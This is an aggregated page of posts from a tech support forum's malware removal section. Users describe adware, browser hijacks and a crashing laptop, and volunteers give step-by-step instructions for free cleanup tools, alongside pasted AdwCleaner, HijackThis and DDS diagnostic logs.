Channel: Tech Support Guy - Virus & Other Malware Removal

Receiving Internet Explorer Error Messages

You're welcome. I'm glad everything got resolved! :)

I could use some help...

No one replied to my previous thread. I am aware that this site is only run by volunteers, but it's been over three days and I've been unable to get on my computer because it's been running so slowly.

Please help me and reply to my previous post? I'd appreciate it!

http://forums.techguy.org/virus-othe...go-chrome.html

Viruses & Adware Removal - Dell vosrol 1510

What about Malwarebytes and RogueKiller, did you run those two, can I see the logs...

Home page in Firefox opens with BING

Google is now the home page in Firefox.
Chrome's home page was changed so that google.com appears. However, Bing can be clicked on at the very top of the page and its page will appear. How should I delete Bing in Chrome?

The Bing toolbar was deleted sometime ago in Control Panel, Programs and Features.

After using AdwCleaner, I then clicked Start and typed %temp%, deleted the files, then typed c:\windows\temp and deleted those files. All files were deleted and I rebooted. This was at the suggestion of another malware removal specialist a few months ago.

# AdwCleaner v3.213 - Report created 23/06/2014 at 17:13:22
# Updated 23/06/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Jack Schwartz - JACKSCHWARTZ-PC
# Running from : C:\Users\Jack Schwartz\Downloads\AdwCleaner (9).exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\Software\BillP Studios

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17126


-\\ Mozilla Firefox v30.0 (en-US)

[ File : C:\Users\Jack Schwartz\AppData\Roaming\Mozilla\Firefox\Profiles\lsxpajl7.default\prefs.js ]


-\\ Google Chrome v35.0.1916.153

[ File : C:\Users\Jack Schwartz\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://en.softonic.com/s/{searchTerms}
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Deleted [Search Provider] : hxxp://web.search.aol.com/redirector/sredir?sredir=843&q={searchTerms}&s_it=customie11-ie

*************************

AdwCleaner[R0].txt - [13377 octets] - [11/04/2014 12:19:42]
AdwCleaner[R10].txt - [2087 octets] - [17/06/2014 14:48:56]
AdwCleaner[R11].txt - [2128 octets] - [23/06/2014 17:11:39]
AdwCleaner[R1].txt - [3081 octets] - [22/05/2014 20:51:13]
AdwCleaner[R2].txt - [3141 octets] - [22/05/2014 20:55:01]
AdwCleaner[R3].txt - [3347 octets] - [22/05/2014 21:00:25]
AdwCleaner[R4].txt - [3261 octets] - [22/05/2014 21:02:51]
AdwCleaner[R5].txt - [1513 octets] - [22/05/2014 21:10:03]
AdwCleaner[R6].txt - [3945 octets] - [29/05/2014 19:42:31]
AdwCleaner[R7].txt - [3295 octets] - [31/05/2014 05:02:33]
AdwCleaner[R8].txt - [2171 octets] - [16/06/2014 07:08:22]
AdwCleaner[R9].txt - [2174 octets] - [16/06/2014 07:42:35]
AdwCleaner[S0].txt - [13628 octets] - [11/04/2014 12:20:43]
AdwCleaner[S1].txt - [3257 octets] - [22/05/2014 21:03:39]
AdwCleaner[S2].txt - [1578 octets] - [22/05/2014 21:10:50]
AdwCleaner[S3].txt - [3572 octets] - [29/05/2014 19:44:46]
AdwCleaner[S4].txt - [3376 octets] - [31/05/2014 05:03:38]
AdwCleaner[S5].txt - [1973 octets] - [16/06/2014 07:12:11]
AdwCleaner[S6].txt - [2241 octets] - [16/06/2014 07:43:26]
AdwCleaner[S7].txt - [2419 octets] - [17/06/2014 16:22:56]
AdwCleaner[S8].txt - [2320 octets] - [23/06/2014 17:13:22]

########## EOF - C:\AdwCleaner\AdwCleaner[S8].txt - [2380 octets] ##########

Issues with being able to go on chrome without ads

I downloaded hitmanpro and it scanned and fixed the issue. Sorry if anyone else has had this problem, but that should help if you download and scan.

Getting rid of acedrv08.sys blue screen

OK, that seems to have done it...Thanks

Proxy Server Hit

I have had quite the time finding Go Advanced and then Manage Attachments.

Sorry.

Virus highlighting everything

I have a spyware/virus(?) that keeps highlighting everything and leading to another link. It's annoying and not sure what exactly to do. I saw someone else with a similar problem and a tech that gave the solution. Just wondering if it's possible for anyone to get important data from me pasting my logs on this forum? Also, will it cause anything to be deleted from my computer? Thanks in advance for any help!

Need help with Bin - miner.exe removal and other problems.

Malwarebytes wont remove ransomware

Yes, Malwarebytes is very good, but sometimes it cannot keep up with new versions of infections....

Save the attached file fixlist.txt to your flash drive, same place as FRST.
Now please enter System Recovery Options as you did to get the log.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the flash drive (Fixlog.txt); please post it in your reply.

Next,

Reboot and see if Windows will run in Normal mode; if so, continue please:

Download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

Next,

Please download RogueKiller and save it to your desktop from the following link: http://www.bleepingcomputer.com/download/roguekiller/
  • Quit all running programs.
  • For Windows XP, double-click to start.
  • For Vista, Windows 7/8, right-click on the program and select Run as Administrator to start, and when prompted allow it to run.
  • Read and accept the EULA (End User License Agreement)
  • Click Scan to scan the system.
  • When the scan completes, close the program > Don't Fix anything!
  • Post back the report which should be located on your desktop.

Let me see those logs in next reply...

Kevin

Attached Files
File Type: txt fixlist.txt (2.2 KB)

Chrome search directed to other engines

Please download ADWCleaner. Click on the Download Now button and save it to your desktop.

Close your browser and double-click on the AdwCleaner icon on your desktop to run the program.

Click on the Scan button. It may take several minutes to complete. When it is done click on the Report button and copy and paste the log here please.

How to handle Win:32Rootkit-gen[Rtk] in Windows file

I'm not concerned about the Windows Installer file. I believe the two go hand in hand. Windows installer files are created when software gets installed so there's no harm in having quarantined that one.

Multiple tabs opening and freezing issues

Serge2012, thanks for the update, but to be on the safe side I would highly recommend you run FRST and post the logs for me to review. You never know what might still be in there without a proper check. Malwarebytes is very good at removing Malware, but there could be some remnants left behind that would best be removed.

It's your choice.

hijack this bad image virus

Hi juanito88,

It's been a while since you posted... Sorry for that.
Do you still need help?

Computer crashed, black screen no warning

I had a post up here a while back that never got addressed. I figure it got overlooked or it did not seem to be what I thought it was. I am posting this problem here now because of that prior incident, which had something to do with IE and how the machine was jumpy and running funny even after the MS fix for IE.
The computer crashed with no warning to a black screen. It was still running as best I could tell. After it did nothing with ctrl/alt/delete I tried to shut it down by holding the power button. No effect. I hooked up a regular monitor, no luck. I use it with the battery in and the cord hooked up, so I removed the battery (IDK why that occurred to me). When I opened the lid there was the desktop, but it was all large like it was safe mode, but it wasn't safe mode. I put the battery back in and the screen was gone. ???? I tried again to force it to shut down by taking the battery out and unplugging it. I got nothing after I plugged it back in and put the battery back in. I left it alone for a couple of hours with the monitor plugged into it. I just came back to it and it started up; my desktop is on the monitor, not the laptop, and I am in safe mode with networking.
Thank You
Sys Info
Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft® Windows Vista™ Home Premium, Service Pack 2, 64 bit
Processor: Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz, Intel64 Family 6 Model 15 Stepping 13
Processor Count: 2
RAM: 3963 Mb
Graphics Card: Mobile Intel(R) 4 Series Express Chipset Family, 1853 Mb
Hard Drives: C: Total - 142858 MB, Free - 83769 MB;
Motherboard: TOSHIBA, Portable PC
Antivirus: Microsoft Security Essentials, Updated and Enabled

HJT
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 10:34:37 AM, on 6/24/2014
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v9.00 (9.00.8112.16555)
Boot mode: Safe mode with network support

Running processes:
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Users\user2\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = Preserve
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O1 - Hosts: ::1 localhost
O2 - BHO: Ghostery BHO - {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [TOSCDSPD] TOSCDSPD.EXE
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: Ghostery - {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab
O18 - Filter hijack: text/html - {4459DC76-1FDE-4B16-BAD0-E4F8E7647555} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryMimeFilter.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Unknown owner - C:\Windows\system32\agr64svc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: @dfsrres.dll,-101 (DFSR) - Unknown owner - C:\Windows\system32\DFSR.exe (file missing)
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SLsvc.exe,-101 (slsvc) - Unknown owner - C:\Windows\system32\SLsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files (x86)\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\Windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 7477 bytes

DDS
DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 9.0.8112.16555 BrowserJavaVersion: 10.55.2
Run by user2 at 10:36:39 on 2014-06-24
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.3963.2985 [GMT -7:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {641105E6-77ED-3F35-A304-765193BCB75F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Windows Mail\WinMail.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\GhosteryIEplugin\GhosteryRegistryProxy.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uSearch Bar = Preserve
uProxyOverride = <local>
mWinlogon: Userinit = userinit.exe,
BHO: Ghostery Add-On: {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRun: [TOSCDSPD] TOSCDSPD.EXE
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\HPDIGI~1.LNK - C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MICROS~1.LNK - C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - {237EB6DA-3FEA-4DD2-8A61-A901B5C489D7} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryBrowserHelperObject.dll
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86} : DHCPNameServer = 75.75.75.75 75.75.76.76
Filter: text/html - {4459DC76-1FDE-4B16-BAD0-E4F8E7647555} - C:\Program Files (x86)\GhosteryIEplugin\GhosteryMimeFilter.dll
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
x64-Run: [IAAnotif] "C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe"
x64-Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [TPwrMain] C:\Program Files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
x64-Run: [HSON] C:\Program Files (x86)\TOSHIBA\TBS\HSON.exe
x64-Run: [SmoothView] C:\Program Files (x86)\Toshiba\SmoothView\SmoothView.exe
x64-Run: [00TCrdMain] C:\Program Files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Run: [RtHDVCpl] RAVCpl64.exe
x64-Run: [Skytel] Skytel.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Filter: text/html - {4459DC76-1FDE-4B16-BAD0-E4F8E7647555} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\user2\AppData\Roaming\Mozilla\Firefox\Profiles\y89g7629.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - about:blank
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_125.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;aswRvrt;C:\Windows\System32\drivers\aswRvrt.sys [2013-3-18 65336]
R0 aswVmm;aswVmm;C:\Windows\System32\drivers\aswVmm.sys [2013-3-18 178624]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\Windows\System32\drivers\tos_sps64.sys [2012-3-4 504912]
R2 !SASCORE;SAS Core Service;C:\Program Files\SUPERAntiSpyware\SASCore64.exe [2011-8-11 140672]
R3 FwLnk;FwLnk Driver;C:\Windows\System32\drivers\FwLnk.sys [2008-8-18 8704]
S0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2014-1-25 268512]
S1 SASDIFSV;SASDIFSV;C:\Program Files\SUPERAntiSpyware\sasdifsv64.sys [2011-7-22 14928]
S1 SASKUTIL;SASKUTIL;C:\Program Files\SUPERAntiSpyware\saskutil64.sys [2011-7-12 12368]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 27648]
S2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2013-9-27 133928]
S2 TMachInfo;TMachInfo;C:\Program Files (x86)\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2008-8-18 46392]
S3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2014-3-11 347872]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2008-1-20 19968]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2013-9-11 1012344]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2012-3-4 89920]
S4 KR10I64;KR10I64;C:\Windows\System32\drivers\KR10I64.sys [2008-8-18 248320]
S4 KR10N64;KR10N64;C:\Windows\System32\drivers\KR10N64.sys [2008-8-18 237568]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2014-06-15 13:33:47 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-15 13:33:47 699056 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-06-11 21:17:36 95414520 ----a-w- C:\Windows\System32\mrt.exe
2014-05-28 18:53:05 17857536 ----a-w- C:\Windows\System32\mshtml.dll
2014-05-28 18:37:06 2338816 ----a-w- C:\Windows\System32\jscript9.dll
2014-05-28 18:35:43 10890240 ----a-w- C:\Windows\System32\ieframe.dll
2014-05-28 18:31:53 1348608 ----a-w- C:\Windows\System32\urlmon.dll
2014-05-28 18:31:31 1392128 ----a-w- C:\Windows\System32\wininet.dll
2014-05-28 18:30:24 1494016 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-05-28 18:30:06 237056 ----a-w- C:\Windows\System32\url.dll
2014-05-28 18:29:57 86016 ----a-w- C:\Windows\System32\jsproxy.dll
2014-05-28 18:29:28 173056 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-05-28 18:29:19 599040 ----a-w- C:\Windows\System32\vbscript.dll
2014-05-28 18:29:19 2148352 ----a-w- C:\Windows\System32\iertutil.dll
2014-05-28 18:29:11 816640 ----a-w- C:\Windows\System32\jscript.dll
2014-05-28 18:29:09 729088 ----a-w- C:\Windows\System32\msfeeds.dll
2014-05-28 18:28:40 55296 ----a-w- C:\Windows\System32\msfeedsbs.dll
2014-05-28 18:28:38 453120 ----a-w- C:\Windows\System32\dxtmsft.dll
2014-05-28 18:28:34 282112 ----a-w- C:\Windows\System32\dxtrans.dll
2014-05-28 18:28:30 11264 ----a-w- C:\Windows\System32\msfeedssync.exe
2014-05-28 18:28:20 96768 ----a-w- C:\Windows\System32\mshtmled.dll
2014-05-28 18:28:10 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2014-05-28 18:28:02 12800 ----a-w- C:\Windows\System32\mshta.exe
2014-05-28 18:27:30 248320 ----a-w- C:\Windows\System32\ieui.dll
2014-05-28 16:48:31 12356608 ----a-w- C:\Windows\SysWow64\mshtml.dll
2014-05-28 16:39:36 1810432 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-05-28 16:38:21 9711104 ----a-w- C:\Windows\SysWow64\ieframe.dll
2014-05-28 16:33:46 1106432 ----a-w- C:\Windows\SysWow64\urlmon.dll
2014-05-28 16:32:59 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-05-28 16:32:25 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-05-28 16:31:33 231936 ----a-w- C:\Windows\SysWow64\url.dll
2014-05-28 16:31:17 65536 ----a-w- C:\Windows\SysWow64\jsproxy.dll
2014-05-28 16:30:53 421376 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-05-28 16:30:53 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-05-28 16:30:44 717824 ----a-w- C:\Windows\SysWow64\jscript.dll
2014-05-28 16:30:31 1796096 ----a-w- C:\Windows\SysWow64\iertutil.dll
2014-05-28 16:30:25 607744 ----a-w- C:\Windows\SysWow64\msfeeds.dll
2014-05-28 16:30:08 353792 ----a-w- C:\Windows\SysWow64\dxtmsft.dll
2014-05-28 16:30:00 41472 ----a-w- C:\Windows\SysWow64\msfeedsbs.dll
2014-05-28 16:29:58 223232 ----a-w- C:\Windows\SysWow64\dxtrans.dll
2014-05-28 16:29:49 10752 ----a-w- C:\Windows\SysWow64\msfeedssync.exe
2014-05-28 16:29:44 73216 ----a-w- C:\Windows\SysWow64\mshtmled.dll
2014-05-28 16:29:31 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-05-28 16:29:27 11776 ----a-w- C:\Windows\SysWow64\mshta.exe
2014-05-28 16:28:35 176640 ----a-w- C:\Windows\SysWow64\ieui.dll
2014-04-30 00:46:03 96168 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-04-30 00:46:00 264616 ----a-w- C:\Windows\SysWow64\javaws.exe
2014-04-30 00:46:00 175528 ----a-w- C:\Windows\SysWow64\javaw.exe
2014-04-30 00:46:00 175016 ----a-w- C:\Windows\SysWow64\java.exe
2014-04-26 18:21:07 622592 ----a-w- C:\Windows\System32\usp10.dll
2014-04-26 16:01:22 502784 ----a-w- C:\Windows\SysWow64\usp10.dll
2014-04-05 04:26:44 1417664 ----a-w- C:\Windows\System32\drivers\tcpip.sys
2014-04-05 02:32:17 40448 ----a-w- C:\Windows\System32\drivers\tcpipreg.sys
.
============= FINISH: 10:37:25.41 ===============

attach.txt
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 3/4/2012 12:49:16 PM
System Uptime: 6/24/2014 10:22:31 AM (0 hours ago)
.
Motherboard: TOSHIBA | | Portable PC
